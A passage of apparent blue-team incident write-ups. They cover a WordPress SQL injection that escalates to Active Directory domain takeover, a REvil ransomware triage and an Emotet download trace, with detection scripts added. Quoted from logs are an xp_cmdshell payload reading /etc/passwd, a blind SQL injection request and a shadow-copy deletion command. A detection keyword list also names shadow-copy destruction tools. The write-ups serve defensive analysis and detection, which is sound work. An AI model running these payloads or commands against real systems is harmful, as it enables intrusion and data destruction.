payload and compares the response with the clean baseline to see whether a filtering device alters or blocks it. The payload bundles several signatures at once. The UNION ALL SELECT ... FROM information_schema.tables has the shape of schema enumeration, appending an additional result set to the original query. The \u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt; string embedded in the UNION output is the kind of marker that tests whether SQL results are reflected unsanitized into the HTTP response.
Finally, EXEC xp_cmdshell(\u0026#39;cat ../../../etc/passwd\u0026#39;) is an attempt at OS command execution through SQL Server\u0026rsquo;s shell procedure with a path traversal to read the system password file; it cannot execute here, because WordPress runs on MySQL or MariaDB, which the MySQL-specific ORD/MID/IFNULL syntax of the later requests confirms. The server responded with HTTP 200 and 10,301 bytes - the same shape as the clean baseline - which told sqlmap that no WAF was filtering the parameter. The injection itself is confirmed by what followed, since sqlmap only moves on to data extraction once it has found a working injection point.\nsqlmap then shifted to systematic blind boolean-based extraction of the user_pass column from wordpress.wp_users. At 02:52:47 requests of the following pattern were observed:\nGET /wordpress/wp-admin/admin-ajax.php?action=get_question\u0026amp;question_id=1 AND ORD(MID((SELECT IFNULL(CAST(user_pass AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),59,1))\u0026gt;96\nEach request asks one yes/no question - is the byte at offset 59 of the first user\u0026rsquo;s hash greater than 96? - and sqlmap reads the answer from whether the response matches the baseline, binary-searching each byte in roughly eight requests. Offset 59 shows the hash is at least 59 characters long, consistent with a 60-character bcrypt hash (WordPress 6.8 and later) rather than the 34-character phpass hash of older installs. The extraction campaign ran until 03:11:50, at which point the last sqlmap request was recorded.\nPost-Exploitation and Lateral Movement # With cracked WordPress credentials, the attacker pivoted into Active Directory. I correlated the timeline by examining Windows Security event logs alongside the web logs. The table of authentication events grouped by target_user and ip_address revealed the full lateral movement sequence. One caveat on cross-source ordering: the first AD logon at 02:35 precedes the 02:52-03:11 extraction window in the web log, so either the web server and domain controller clocks are offset or the credential came from an earlier request; verify the clock offset before reading the two timelines as one.\nAt 02:35 the attacker first accessed mourinho.j from 47.128.63.0, with an ANONYMOUS LOGON event co-occurring in the same window - consistent with an initial unauthenticated LDAP or SMB reconnaissance step before authenticating. At 02:40 I found a cluster of Event ID 4769 (Kerberos Service Ticket Request) events in which target_user_name - the requesting account in 4769, not the service - was mourinho.j@worldcup.ball.\nThe expanded Event 4769 showed target_user_name: mourinho.j@worldcup.ball, service_name: alonso.x, and critically ticket_encryption_type: 0x17 - 0x17 is RC4-HMAC, the legacy encryption type Kerberoasting tools request because an RC4 ticket is keyed with the service account\u0026rsquo;s NT hash and cracks far faster than AES. In a Kerberoasting attack the attacker requests a TGS ticket for a service account (any account with an SPN), receives it encrypted with that account\u0026rsquo;s NT hash, and cracks it offline; a 4769 with encryption type 0x17 whose service_name is a user account rather than a computer account ending in $ is the standard detection, with false positives from legacy systems that still negotiate RC4.
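Before following the Active Directory side further, one question the web log can answer on its own is what the blind extraction described in the SQL Injection section actually recovered. The script below is an added example for this page, not code from the original post or from sqlmap: each sqlmap request asks one comparison (is byte N of the value greater than X?) and reads the answer from the response size, so a defender holding the access log can replay that logic and rebuild the extracted string byte by byte. The log lines are constructed in Apache combined format, shaped like the request quoted above; the value used to generate them, the baseline size and the false-branch size are assumptions.

```python
"""Recover what a boolean-based blind SQL injection extracted, from the access log.

Added example for this writeup, not code from the original post or from sqlmap.
Each sqlmap request asks one comparison (is byte N of the value greater than X?)
and reads the answer from the response size, so a defender holding the access
log can replay the same logic and recover the extracted string. The log lines
are constructed here in Apache combined format, shaped like the request in the
post; the value used to generate them, the baseline size and the false-branch
size are assumptions.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# ORD(MID((<query>),<pos>,1))><val> : sqlmap's MySQL boolean-blind comparison
COMPARE_RE = re.compile(r"ORD\(MID\(\((?P<query>.+?)\),(?P<pos>\d+),1\)\)(?P<op>[><=])(?P<val>\d+)")

def parse_log_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["path"] = unquote(d["path"])
    d["size"] = 0 if d["size"] == "-" else int(d["size"])
    return d

def reconstruct(lines, baseline_size):
    """Group comparison requests by (query, position); a response of baseline
    size means TRUE. For each position the byte c satisfies c > x for every
    true '>' probe and c <= x for every false one, so the probes pin c to one
    value once the search completed. Returns {query: recovered_string}, with
    '?' at positions the log does not fully resolve."""
    probes = {}
    for line in lines:
        req = parse_log_line(line)
        if not req:
            continue
        m = COMPARE_RE.search(req["path"])
        if not m:
            continue
        key = (m.group("query"), int(m.group("pos")))
        probes.setdefault(key, []).append((m.group("op"), int(m.group("val")),
                                           req["size"] == baseline_size))
    recovered = {}
    for (query, pos), plist in probes.items():
        lo, hi = 0, 255                       # invariant: c in (lo, hi]
        for op, val, truth in plist:
            if op == ">":
                lo, hi = (max(lo, val), hi) if truth else (lo, min(hi, val))
            elif op == "=" and truth:
                lo, hi = val - 1, val
        recovered.setdefault(query, {})[pos] = chr(hi) if hi - lo == 1 else "?"
    return {q: "".join(chars[p] for p in sorted(chars)) for q, chars in recovered.items()}

def simulate_sqlmap(value, query, baseline_size, false_size=47):
    """Constructed log lines, as a binary search over each byte would produce them."""
    lines = []
    for pos, ch in enumerate(value, start=1):
        lo, hi = 0, 255
        while hi - lo > 1:
            mid = (lo + hi) // 2
            truth = ord(ch) > mid
            path = ("/wordpress/wp-admin/admin-ajax.php?action=get_question&question_id=1"
                    " AND ORD(MID((%s),%d,1))>%d" % (query, pos, mid))
            lines.append('47.128.63.0 - - [18/Sep/2025:02:52:47 +0000] "GET %s HTTP/1.1" 200 %d '
                         '"-" "sqlmap/1.9.3"' % (path.replace(" ", "%20"),
                                                 baseline_size if truth else false_size))
            lo, hi = (mid, hi) if truth else (lo, mid)
    return lines

QUERY = "SELECT IFNULL(CAST(user_pass AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1"

if __name__ == "__main__":
    log = simulate_sqlmap("$2y$10$examplehash", QUERY, baseline_size=10301)   # constructed value
    print(len(log), "requests ->", reconstruct(log, 10301))
```

Run against a real log, the baseline size is the response to the clean question_id=1 probe, and positions that come back as ? mark requests the log lost or that sqlmap retried; the count of resolved positions also tells you how far the attacker got before the last request at 03:11:50.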
On the Kerberos side, the 0x17 ticket confirmed that the attacker used mourinho.j\u0026rsquo;s session to Kerberoast alonso.x and subsequently cracked its password offline, gaining access as alonso.x at 02:50.\nAt 02:50:30, acting as alonso.x, the attacker created a new computer account - Event ID 4741 (Computer Account Created) - with sam_account_name: MADRID$ on PACIFIC-DC.worldcup.ball.\nCreating a rogue computer account is the usual first step of a Resource-Based Constrained Delegation (RBCD) attack: the attacker needs an account with a service principal name whose credentials it controls, a computer account has one by default, and the default ms-DS-MachineAccountQuota of 10 lets any domain user create one. One second later at 02:50:31, Event ID 4742 (Computer Account Changed) was logged with target_user_name: APP-BKUP01$, reflecting alonso.x writing MADRID$ into the backup server account\u0026rsquo;s msDS-AllowedToActOnBehalfOfOtherIdentity attribute so that MADRID$ may impersonate users (via S4U2Self and S4U2Proxy) against services on APP-BKUP01$. That write requires alonso.x to hold write rights over the APP-BKUP01$ object, which is the misconfiguration to fix; a 4741 followed within seconds by a 4742 on a different computer account from the same subject is a tight detection for this pairing.\nAt 02:50:45 the attacker requested a service ticket to APP-BKUP01$ via RBCD and successfully logged into it at 02:54:23.\nAt 02:54:24, Event ID 4886 (Certificate Services received a certificate request) was logged with attributes: CertificateTemplate:WorkstationAuth_Internal and SAN:upn=administrator@worldcup.ball.\nThis is ESC1-style AD CS abuse - the template lets the enrollee supply the subject (the ENROLLEE_SUPPLIES_SUBJECT flag), carries a client-authentication EKU and is enrollable without manager approval, so the attacker embedded administrator@worldcup.ball as the UPN in the Subject Alternative Name (SAN). The matching Event ID 4887 (Certificate Services approved a certificate request and issued a certificate) is the record to pull for the issued certificate\u0026rsquo;s serial number and requester. This certificate can then be used to authenticate as administrator via Kerberos PKINIT, bypassing password requirements entirely.
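The three Security-log steps above each have a compact signature: a 4769 with RC4 for a user-account SPN, a 4741 followed within seconds by a 4742 on a different computer account from the same subject, and a 4886 whose SAN names a principal other than the requester. The script below is an added example for this page, not code from the original post: it implements those three checks over constructed events that use the values quoted here. The requester on the 4886 record, the second benign certificate request and the time thresholds are assumptions.

```python
"""Detection logic for a Kerberoast -> RBCD -> ESC1 escalation chain.

Added example for this writeup, not code from the original post. The checks are
4769 with RC4-HMAC for a user-account SPN, a 4741 followed within a short gap by
a 4742 on a different computer account from the same subject, and a 4886 whose
SAN UPN names a different principal than the requester. The events are
constructed from the values quoted in the post; the Requester field, the benign
second 4886 and the thresholds are assumptions.
"""
from datetime import datetime, timedelta
import re

SAMPLE_EVENTS = [
    {"EventID": 4769, "UtcTime": "2025-09-18T02:40:44", "TargetUserName": "mourinho.j@worldcup.ball",
     "ServiceName": "alonso.x", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:47.128.63.0"},
    {"EventID": 4769, "UtcTime": "2025-09-18T02:40:45", "TargetUserName": "mourinho.j@worldcup.ball",
     "ServiceName": "PACIFIC-DC$", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:47.128.63.0"},
    {"EventID": 4741, "UtcTime": "2025-09-18T02:50:30", "SubjectUserName": "alonso.x",
     "TargetUserName": "MADRID$"},
    {"EventID": 4742, "UtcTime": "2025-09-18T02:50:31", "SubjectUserName": "alonso.x",
     "TargetUserName": "APP-BKUP01$"},
    {"EventID": 4886, "UtcTime": "2025-09-18T02:54:24", "Requester": "WORLDCUP\\alonso.x",
     "Attributes": "CertificateTemplate:WorkstationAuth_Internal\nSAN:upn=administrator@worldcup.ball"},
    {"EventID": 4886, "UtcTime": "2025-09-18T03:10:00", "Requester": "WORLDCUP\\APP-BKUP01$",
     "Attributes": "CertificateTemplate:Machine"},   # benign machine enrolment, constructed
]

def _t(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%dT%H:%M:%S")

def kerberoast_candidates(events):
    """Successful 4769 with RC4-HMAC (0x17) for a user-account SPN. Computer
    accounts (trailing $) and krbtgt are excluded: those tickets are not the
    crackable targets Kerberoasting goes after, and RC4 to them is noise."""
    out = []
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        svc = ev["ServiceName"]
        if ev["TicketEncryptionType"].lower() == "0x17" and not svc.endswith("$") and svc.lower() != "krbtgt":
            out.append({"time": ev["UtcTime"], "requester": ev["TargetUserName"],
                        "service_account": svc, "source": ev["IpAddress"]})
    return out

def rbcd_setup_pairs(events, max_gap=timedelta(seconds=60)):
    """A 4741 (computer created) followed within max_gap by a 4742 (computer
    changed) on a different account by the same subject: the shape of a rogue
    account plus a delegation write."""
    created = [ev for ev in events if ev.get("EventID") == 4741]
    changed = [ev for ev in events if ev.get("EventID") == 4742]
    pairs = []
    for c in created:
        for ch in changed:
            gap = _t(ch) - _t(c)
            if (timedelta(0) <= gap <= max_gap and ch["SubjectUserName"] == c["SubjectUserName"]
                    and ch["TargetUserName"] != c["TargetUserName"]):
                pairs.append({"subject": c["SubjectUserName"], "new_account": c["TargetUserName"],
                              "delegation_target": ch["TargetUserName"],
                              "gap_seconds": gap.total_seconds()})
    return pairs

SAN_UPN_RE = re.compile(r"SAN:.*?upn=([^\s&,]+)", re.I | re.S)
TEMPLATE_RE = re.compile(r"CertificateTemplate:(\S+)")

def esc1_requests(events):
    """4886 whose request attributes carry a SAN UPN for a principal other than
    the requester: the attacker-supplied subject that ESC1 depends on."""
    out = []
    for ev in events:
        if ev.get("EventID") != 4886:
            continue
        m = SAN_UPN_RE.search(ev.get("Attributes", ""))
        if not m:
            continue
        upn = m.group(1)
        requester_account = ev["Requester"].split("\\")[-1].lower()
        if upn.split("@")[0].lower() != requester_account:
            tm = TEMPLATE_RE.search(ev["Attributes"])
            out.append({"time": ev["UtcTime"], "requester": ev["Requester"], "san_upn": upn,
                        "template": tm.group(1) if tm else None})
    return out

def escalation_chain(events):
    return {"kerberoast": kerberoast_candidates(events),
            "rbcd": rbcd_setup_pairs(events),
            "esc1": esc1_requests(events)}

if __name__ == "__main__":
    for stage, hits in escalation_chain(SAMPLE_EVENTS).items():
        print(stage, hits)
```

The ESC1 check is deliberately about the mismatch between requester and SAN rather than about any particular template name: the template in this incident is site-specific, but a certificate request that names someone else is the invariant.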
At 02:54:32, 8 seconds later, Event ID 4769 fired on PACIFIC-DC.worldcup.ball with target_user_name: administrator@worldcup.ball, service_name: Administrator, and ip_address: ::ffff:47.128.63.0. A service ticket requested by administrator for the Administrator account itself is consistent with the user-to-user (U2U) request that tools such as Certipy and Rubeus issue after PKINIT to recover the account\u0026rsquo;s NT hash from the ticket; either way the event shows the forged certificate was accepted for Kerberos authentication and confirms full domain administrator access.\nIOCs # Type - Value - Description\nIP - 47.128.63.0 - attacker IP, all attack stages\nHost - feefaworldcup.co.th - targeted WordPress host\nHost - PACIFIC-DC.worldcup.ball - Domain Controller, lateral movement target\nHost - APP-BKUP01$ - backup server, RBCD target\nDomain - worldcup.ball - compromised AD domain\nCVE - CVE-2021-24762 - Perfect Survey plugin SQLi, CVSS 9.8\nPlugin - /wordpress/wp-content/plugins/perfect-survey/ - vulnerable plugin path\nAccount - mourinho.j - initial AD foothold via cracked WordPress credentials\nAccount - alonso.x - Kerberoasted service account, used for RBCD setup\nAccount - MADRID$ - rogue computer account created by attacker\nAccount - administrator@worldcup.ball - final compromised account via AD CS abuse\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef recon fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exploit fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef lateral fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef persist fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef pwned fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; A([47.128.63.0 - Attacker]):::default --\u003e B[02:12:30 - Nmap NSE scanfeefaworldcup.co.th/wordpress/]:::recon B --\u003e C[02:19:21 - WPScan v3.8.28Perfect Survey plugin discoveredversion.php and wp-cron.php accessed]:::recon C --\u003e D[02:23:39 - sqlmap 1.9.3CVE-2021-24762 initial probe/wp-admin/admin-ajax.php?action=get_question]:::exploit D --\u003e E[02:25:31 -
UNION+XSS+RCE payloadHTTP 200 - injection confirmed]:::exploit E --\u003e F[02:52:47 - Blind SQLi extractionuser_pass from wordpress.wp_usersends at 03:11:50]:::exploit subgraph AD [Active Directory Compromise] F --\u003e G[02:35 - mourinho.j accessinitial AD foothold]:::lateral G --\u003e H[02:40:44 - Event 4769Kerberoasting alonso.xRC4-HMAC ticket requested]:::lateral H --\u003e I[02:50 - alonso.x accesshash cracked offline]:::lateral I --\u003e J[02:50:30 - Event 4741MADRID$ computer account created]:::persist J --\u003e K[02:50:31 - Event 4742RBCD configured on APP-BKUP01$]:::persist K --\u003e L[02:54:23 - logged into APP-BKUP01$]:::persist end subgraph Escalation [Domain Escalation] L --\u003e M[02:54:24 - Event 4886AD CS certificate requestSAN: administrator@worldcup.ball]:::pwned M --\u003e N[02:54:32 - Event 4769administrator@worldcup.ball TGSPACIFIC-DC.worldcup.ball]:::pwned end ","date":"April 8, 2026","externalUrl":null,"permalink":"/blue_team/elk-perfect-survey/","section":"","summary":"An attacker conducted reconnaissance with Nmap and WPScan against a WordPress site, exploited CVE-2021-24762 in the Perfect Survey plugin via SQLi to extract wp_users password hashes, then pivoted into Active Directory by Kerberoasting alonso.x, creating a rogue computer account, abusing RBCD, and escalating to domain administrator via AD CS certificate abuse.","title":"ELK-Perfect Survey","type":"blue_team"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/kerberoasting/","section":"Tags","summary":"","title":"Kerberoasting","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/privilege-escalation/","section":"Tags","summary":"","title":"Privilege Escalation","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/rbcd/","section":"Tags","summary":"","title":"RBCD","type":"tags"},{"content":"","date":"April 8, 
2026","externalUrl":null,"permalink":"/tags/sql-injection/","section":"Tags","summary":"","title":"SQL Injection","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/sqlmap/","section":"Tags","summary":"","title":"Sqlmap","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/wordpress/","section":"Tags","summary":"","title":"WordPress","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/wpscan/","section":"Tags","summary":"","title":"WPScan","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/any.run/","section":"Tags","summary":"","title":"ANY.RUN","type":"tags"},{"content":" TL;DR # An Administrator on host WIN-1RKSOVFDBN0 executed facebook assistant.exe from the Downloads folder. The process (PID 5348) created 5uizv5660t-readme.txt ransom notes across multiple user profile directories, confirming active ransomware deployment. A child PowerShell process (PID 1860) ran a base64-encoded command that deleted every Volume Shadow Copy via WMI - a standard ransomware anti-recovery technique. The executable hash was confirmed on VirusTotal as ransomware.sodinokibi/sodin (REvil).\nInitial Triage # I started the investigation in Kibana - the visualization and search interface for the ELK stack, which here ingests Windows event logs generated by Sysmon. Since the scenario involved a ransomware attack, I began by examining the event.code field distribution, expecting a high volume of Sysmon Event ID 11 (FileCreate) events - the event type generated whenever a process creates or overwrites a file on disk.\nThe field summary confirmed Event ID 11 dominated at 64.6% of 1,153 records. 
I pivoted to examining rare values of winlog.event_data.TargetFilename to identify what files were being created across the system.\nThe table immediately surfaced 5uizv5660t-readme.txt written across an unusually wide range of directories:\n- C:\\Users\\Default\\Desktop\\\n- C:\\Users\\Default\\Documents\\\n- C:\\Users\\Default\\Downloads\\\n- C:\\Users\\Default\\Music\\\n- C:\\Users\\Default\\Pictures\\\n- C:\\Users\\Default\\Favorites\\\n- C:\\Users\\Default\\Links\\\n- C:\\Users\\Default\\Saved Games\\\nand others including C:\\Users\\Administrator\\Desktop\\ and C:\\Users\\Administrator\\Downloads\\. The same note dropped uniformly into every user profile subdirectory - including the Default profile, which no user works in - is a definitive ransomware indicator. I noted the earliest timestamps were 2023-09-04, establishing the infection date.\nInitial Execution # To identify which process created the ransom notes, I expanded one of the FileCreate events for 5uizv5660t-readme.txt and examined the originating image and process ID.\nThe expanded document showed the responsible process was C:\\Users\\Administrator\\Downloads\\facebook assistant.exe running as WIN-1RKSOVFDBN0\\Administrator with PID 5348; the FileCreate event itself was logged at 2023-09-07 16:09:59. The file was executed directly from the Administrator\u0026rsquo;s Downloads folder with High integrity level. I extracted the hashes from winlog.event_data.Hashes:\nSHA1=E5D8D5EECF7957996485CBC1CDBEAD9221672A1A\nMD5=4D84641B65D8BB6C3EF03BF59434242D\nSHA256=B8D7FB4488C0556385498271AB9FFFDF0EB38BB2A330265D9852E3A6288092AA\nIMPHASH=C686E5B9F7A178EB79F1CF16460B6A18\nShadow Copy Deletion # I searched for processes spawned by PID 5348 to identify any child activity, filtering on winlog.event_data.ParentProcessId.keyword : \u0026quot;5348\u0026quot; with event.code : 1 (Sysmon ProcessCreate).\nThe query returned 1 hit - a PowerShell process (PID 1860) launched at 2023-09-07 16:09:53 with a base64-encoded command line. 
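The two signals used in this triage - one PID writing the same filename into many profile directories (Event ID 11 fan-out) and a child process whose -EncodedCommand decodes to a shadow-copy deletion - can be checked mechanically once the events are exported from Kibana. The block below is an added example and not part of the original write-up; the event list, the fan-out threshold and the keyword list are constructed for illustration, and the field names follow the winlogbeat/Sysmon layout seen in the investigation (ProcessId, ParentProcessId, Image, CommandLine, TargetFilename).

```python
"""Added example (not from the original write-up): Sysmon ransomware triage
over constructed events mimicking the winlog.event_data fields Kibana showed.
Assumed/constructed: the sample events, the fan-out threshold, the keyword list."""
import base64
import re
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Optional


def _enc(ps: str) -> str:
    # powershell.exe -EncodedCommand expects base64 of UTF-16LE text
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events (illustrative values, not copied from the host).
SAMPLE_EVENTS = [
    {"event.code": 1, "ProcessId": 5348, "ParentProcessId": 4000,
     "Image": r"C:\Users\Administrator\Downloads\facebook assistant.exe",
     "CommandLine": r'"C:\Users\Administrator\Downloads\facebook assistant.exe"'},
    {"event.code": 1, "ProcessId": 1860, "ParentProcessId": 5348,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                    + _enc("Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}")},
] + [
    {"event.code": 11, "ProcessId": 5348,
     "Image": r"C:\Users\Administrator\Downloads\facebook assistant.exe",
     "TargetFilename": rf"C:\Users\{u}\{d}\5uizv5660t-readme.txt"}
    for u in ("Default", "Administrator")
    for d in ("Desktop", "Documents", "Downloads", "Pictures")
] + [
    # benign noise: explorer writing one file into one directory
    {"event.code": 11, "ProcessId": 7777, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\Administrator\Documents\notes.txt"},
]

# Substrings that indicate shadow-copy destruction (WMI, vssadmin, wmic forms)
SHADOW_KEYWORDS = ("win32_shadowcopy", "vssadmin", "delete shadows", "wmic shadowcopy")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ransom_note_fanout(events, min_dirs=5):
    """(pid, filename) -> sorted directories, for FileCreate events where one
    process writes the same filename into at least min_dirs directories."""
    seen = defaultdict(set)
    for e in events:
        if e.get("event.code") != 11:
            continue
        p = PureWindowsPath(e["TargetFilename"])
        seen[(e["ProcessId"], p.name.lower())].add(str(p.parent).lower())
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_dirs}


def shadow_copy_deletions(events):
    """(pid, parent_pid, command) for ProcessCreate events whose command line,
    after decoding any -EncodedCommand, deletes shadow copies."""
    hits = []
    for e in events:
        if e.get("event.code") != 1:
            continue
        cmd = decode_encoded_command(e["CommandLine"]) or e["CommandLine"]
        if any(k in cmd.lower() for k in SHADOW_KEYWORDS):
            hits.append((e["ProcessId"], e["ParentProcessId"], cmd))
    return hits


def triage(events):
    """Processes that both fan out a note and spawn a shadow-copy deletion."""
    note_pids = {pid for pid, _ in ransom_note_fanout(events)}
    return sorted({ppid for _, ppid, _ in shadow_copy_deletions(events) if ppid in note_pids})


if __name__ == "__main__":
    print(ransom_note_fanout(SAMPLE_EVENTS))
    print(shadow_copy_deletions(SAMPLE_EVENTS))
    print(triage(SAMPLE_EVENTS))  # [5348]
```

The decode step matters: a substring match on `Win32_Shadowcopy` against the raw command line finds nothing, because the attacker shipped it base64-encoded in UTF-16LE; only the decoded text is worth matching against the keyword list.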
Decoding the payload revealed:\nGet-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\nThis command enumerates all Volume Shadow Copies via WMI and deletes them - the standard technique used by ransomware to prevent victims from restoring files from Windows built-in snapshots. The PowerShell binary was signed by Microsoft Corporation, confirming the attacker used a legitimate system binary (LOLBin) to execute the destructive command.\nMalware Confirmation # I submitted the SHA256 B8D7FB4488C0556385498271AB9FFFDF0EB38BB2A330265D9852E3A6288092AA to VirusTotal for a static reputation check.\n66/72 vendors flagged the sample as ransomware.sodinokibi/sodin - this is REvil, a ransomware-as-a-service family operated by the threat group GOLD SOUTHFIELD.\nC2 Infrastructure # I submitted the sample to any.run for dynamic analysis. The sandbox captured DNS resolution activity showing the sample contacted the Tor onion address:\naplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion\nThis domain is the REvil payment and victim portal hosted on the Tor network, used to deliver decryption keys upon ransom payment. 
Its presence confirms the sample attempted to reach REvil payment infrastructure. Note that .onion names are not resolvable through ordinary DNS (the TLD is reserved for Tor), so a DNS query for this name shows the lookup was made outside a Tor client and would have failed; on a corporate resolver that query is itself a cheap detection signal.\nIOCs # Hosts\n- WIN-1RKSOVFDBN0 - compromised host, Windows Server 2019 Standard Evaluation\nFiles\n- C:\\Users\\Administrator\\Downloads\\facebook assistant.exe - SHA256: B8D7FB4488C0556385498271AB9FFFDF0EB38BB2A330265D9852E3A6288092AA\n- 5uizv5660t-readme.txt - ransom note dropped across all user profile directories\nDomains\n- aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion - REvil Tor payment portal\nAccounts\n- WIN-1RKSOVFDBN0\\Administrator - account used to execute ransomware\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([WIN-1RKSOVFDBN0Administrator]):::default --\u003e B[2023-09-07 16:09:53 - facebook assistant.exeexecuted from DownloadsPID 5348, High integrity]:::access B --\u003e C[2023-09-07 16:09:53 - PowerShell spawnedPID 1860 - encoded command]:::exec C --\u003e D[Shadow copy deletionGet-WmiObject Win32_ShadowcopyForEach Delete]:::exec subgraph Ransomware [Ransomware Activity] D --\u003e E[2023-09-07 16:09:59 - FileCreate Event ID 115uizv5660t-readme.txtC:\\Users\\Default\\* - all subdirs]:::mal E --\u003e F[Ransom note dropped acrossAdministrator and Defaultuser profile directories]:::mal end subgraph C2 [C2 Beaconing] F --\u003e G[DNS 
resolutionaplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onionREvil Tor payment portal]:::c2 end ","date":"April 7, 2026","externalUrl":null,"permalink":"/blue_team/elk-revil/","section":"","summary":"An administrator executed facebook assistant.exe on a Windows Server 2019 host, which dropped REvil ransomware (Sodinokibi), spawned a PowerShell process that deleted Volume Shadow Copies, and dropped ransom notes across multiple user profile directories.","title":"ELK-REvil - GOLD SOUTHFIELD","type":"blue_team"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/emotet/","section":"Tags","summary":"","title":"Emotet","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/ids/","section":"Tags","summary":"","title":"IDS","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/password-spraying/","section":"Tags","summary":"","title":"Password Spraying","type":"tags"},{"content":"","date":"April 7, 2026","externalUrl":null,"permalink":"/tags/revil/","section":"Tags","summary":"","title":"REvil","type":"tags"},{"content":" TL;DR # A victim host at 147.32.84.165 was observed downloading multiple malicious executables over HTTP from the attacker-controlled domain nocomcom.com (195.88.191.59). The downloads included fjuivgfhurew.exe (Emotet/Lethic), client.exe (Yakes/Barys), mousedriver.exe (Razy/Dugenpal), hmm.exe (Zusy/Acne - ransomware+worm), and kx4.txt (Dacic/VBAgent), an executable masquerading as a text file. All five unique file hashes extracted from Zeek file logs were confirmed malicious on VirusTotal with detection rates between 57/72 and 65/72 vendors.\nInitial Triage # I started the investigation in Splunk - a SIEM platform that ingests and indexes log data from multiple sources, enabling search, correlation, and visualization of security events. 
My first step was examining the eventtype field distribution across all events to identify which log sources and categories were present.\nThe field summary showed 6 distinct values covering 3.492% of all events. The suricata_eve_dns type dominated with 85.2% of those events, but the entry that drew my attention was suricata_eve_ids_attack with 532 events (2.151%) - Suricata is a network-based IDS that generates ids_attack events when traffic matches known malicious signatures, making this the highest-priority category to investigate first.\nFile Downloads # I ran a query against suricata_eve_ids_attack events to identify what was being downloaded and by whom:\nindex=* sourcetype=suricata eventtype=suricata_eve_ids_attack\n| stats values(dest_ip) values(http.http_user_agent) values(http.url) by src_ip\nThe results showed src IP 195.88.191.59 communicating with dest 147.32.84.165 (the victim host). In Suricata alert records src_ip and dest_ip follow the direction of the packet that matched the signature, so for a file-download rule the serving host appears as src_ip; the Zeek tx_hosts field used below confirms 195.88.191.59 as the sender of the files. The User-Agent was Mozilla/4.0 (compatible; MSIE 6.0.2900.2180; Windows NT 5.1.2600) - a spoofed Internet Explorer 6 string consistent with malware using a hardcoded legacy UA rather than a real browser. The URLs in the request confirmed active malware staging: /bl/chooseee.exe, /bl/client.exe, /kx4.txt, /sv/fjuivgfhurew.exe, and /temp/3425.exe.\nTo confirm the full download timeline, I pivoted to HTTP logs filtered by the attacker IP:\nindex=* src_ip=\u0026#34;195.88.191.59\u0026#34; | table _time, dest_ip, http.hostname, http.url\nThe results confirmed all downloads were served under the Host header nocomcom.com (195.88.191.59). 
